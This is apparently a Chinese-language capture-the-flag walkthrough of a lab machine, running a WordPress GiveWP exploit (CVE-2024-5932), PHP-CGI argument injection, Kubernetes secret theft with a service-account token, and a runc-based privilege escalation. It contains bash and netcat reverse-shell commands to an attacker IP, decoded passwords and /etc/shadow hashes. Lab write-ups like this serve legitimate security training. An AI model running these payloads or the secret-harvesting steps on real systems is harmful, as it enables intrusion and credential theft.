基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.94
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-08 12:45 JST
Nmap scan report for 10.10.11.94
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_  256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp open  http    nginx 1.28.0
|_http-generator: WordPress 6.8.1
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI
|_http-server-header: nginx/1.28.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds

80

donation相关网站,用的wordpress:

GiveWP

常规wpscan,发现使用的GiveWP插件存在大量漏洞:

1
wpscan --url http://10.10.11.94/ --enumerate p,t,u --plugins-detection aggressive

CVE-2024-5932

搜索可以找到相关分析和exp:

对应的url可以在donation station里找到,打到容器内root:

1
2
3
http://10.10.11.94/donations/the-things-we-need/

python3 CVE-2024-5932-rce.py -u http://10.10.11.94/donations/the-things-we-need/ -c "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"

LEGACY_INTRANET_SERVICE

查看环境变量可以发现LEGACY_INTRANET_SERVICE_PORT是在另一个容器上的5000端口:

1
2
3
env

LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000

当前容器内连curl都没有,但可以用prel或者php来构造请求,发现PHP-CGI:

1
2
3
4
5
alias pcurl='perl -MHTTP::Tiny -e '\''$_=shift;$_="http://$_" unless /^https?:\/\//;print HTTP::Tiny->new->get($_)->{content}'\'''

pcurl http://10.43.2.241:5000

<li><a href="/cgi-bin/php-cgi">/cgi-bin/php-cgi</a> — PHP-CGI Handler</li>

PHP-CGI

后面就是利用PHP-CG执行命令了,打到另一个容器内root:

1
2
3
php -r '$u="http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"; $d="id"; $h="Content-Type: application/x-www-form-urlencoded\r\nUser-Agent: curl/7.79.1\r\n"; $ctx=stream_context_create(["http"=>["method"=>"POST","header"=>$h,"content"=>$d]]); echo file_get_contents($u,false,$ctx);' 

php -r '$u="http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"; $d="nc 10.10.14.2 4444 -e sh"; $h="Content-Type: application/x-www-form-urlencoded\r\nUser-Agent: curl/7.79.1\r\n"; $ctx=stream_context_create(["http"=>["method"=>"POST","header"=>$h,"content"=>$d]]); echo file_get_contents($u,false,$ctx);'

kubernetes

后面稍微需要一点k8s知识了,第二个容器内可以看到serviceaccount token,所以就是利用token得到secrets,其中包含USER_PASSWORD:

1
2
3
4
5
6
7
8
9
curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/default/secrets

user-secret-babywyrm
 "data": {
        "MASTERPASS": "c1NWZXZwNzRUaHlZRFJaSnY4VUQyR3JzU0FUSHNyVg=="
      },
      
echo c1NWZXZwNzRUaHlZRFJaSnY4VUQyR3JzU0FUSHNyVg== | base64 -d
sSVevp74ThyYDRZJv8UD2GrsSATHsrV

user flag

上面得到的密码就是babywyrm密码,ssh登录:

提权信息

可以sudo运行debug,但还需要另一个管理密码:

密码实际上就是复用了前面的一个密码:

1
2
3
4
5
curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/default/secrets | grep -irn pass

62:        "mariadb-password": "c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T",

c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T

可以看到是runc debug相关的:

这种条件下,挂载读文件即可

提权 & root flag

自己创建配置文件,通过runc debug执行,读取文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
mkdir -p ~/miao
cd ~/miao
# Create the rootfs directory that runc expects
mkdir rootfs

# Now create the config file
cat > config.json << 'EOF'
{
  "ociVersion": "1.0.2",
  "process": {
    "user": {"uid": 0, "gid": 0},
    "args": ["/bin/cat", "/root/root.txt"],
    "cwd": "/",
    "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
    "terminal": false
  },
  "root": {"path": "rootfs"},
  "mounts": [
    {"destination": "/proc", "type": "proc", "source": "proc"},
    {"destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": ["nosuid","strictatime","mode=755","size=65536k"]},
    {"destination": "/bin", "type": "bind", "source": "/bin", "options": ["bind","ro"]},
    {"destination": "/lib", "type": "bind", "source": "/lib", "options": ["bind","ro"]},
    {"destination": "/lib64", "type": "bind", "source": "/lib64", "options": ["bind","ro"]},
    {"destination": "/root", "type": "bind", "source": "/root", "options": ["bind","ro"]},
    {"destination": "/usr", "type": "bind", "source": "/usr", "options": ["bind","ro"]}
  ],
  "linux": {
    "namespaces": [
      {"type": "pid"},
      {"type": "network"},
      {"type": "ipc"},
      {"type": "uts"},
      {"type": "mount"}
    ]
  }
}
EOF

# Now run it
sudo /opt/debug run miao

shadow

1
2
root:$y$j9T$QFzc3gsorLqusBf73kX1x.$jyvD/pCPnr99xNLW62eqJVCQT5IbN7seZdPI3YoLgCA:20361:0:99999:7:::
babywyrm:$y$j9T$w4JcmxWlt7CcIm56259hg.$6mOkZ1aYlh9uyN3vZp9gRKqlGEzmgGYQRZFP5U/n1X7:20396:0:99999:7:::

参考资料